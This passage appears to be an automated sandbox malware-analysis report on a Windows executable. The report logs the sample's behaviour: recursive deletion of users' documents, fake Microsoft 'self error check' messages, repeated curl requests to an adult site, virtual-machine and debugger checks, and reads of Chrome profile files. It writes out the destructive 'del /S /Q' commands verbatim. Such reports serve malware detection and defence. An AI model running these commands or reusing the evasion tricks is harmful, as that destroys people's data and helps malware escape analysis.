Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect virtual machines (IN, VMware)

Show sources

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Code function: 0_2_009C1400 in eax, dx

0_2_009C1400

Source: C:\Windows\System32\conhost.exe

Window / User API: threadDelayed 408

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Code function: 0_2_009C14A0 Sleep,72A73930,72A73930,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,769F8030,CloseHandle,GetTickCount64,Sleep,Sleep,769F8030,EnumWindows,CreateFileA,IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,KiUserExceptionDispatcher,KiUserExceptionDispatcher,Sleep,CloseHandle,

0_2_009C14A0

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

0_2_009C14A0

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Code function: 0_2_00A528C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00A528C0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Code function: 0_2_009C22F8 SetUnhandledExceptionFilter,	0_2_009C22F8
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Code function: 0_2_009C2195 IsProcessorFeaturePresent,72A73930,72A73930,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009C2195
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Code function: 0_2_009C19E3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_009C19E3

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: unknown unknown	Jump to behavior

Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Code function: 0_2_009C2405 cpuid

0_2_009C2405

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Code function: 0_2_009C2082 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009C2082

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b769a4d951e2b603_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Last Tabs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c05775e9c4f00749_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\67c62b86322c36fa_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Trust Tokens	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENT	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33ffb3f3969344d8_0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENT	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log	Jump to behavior
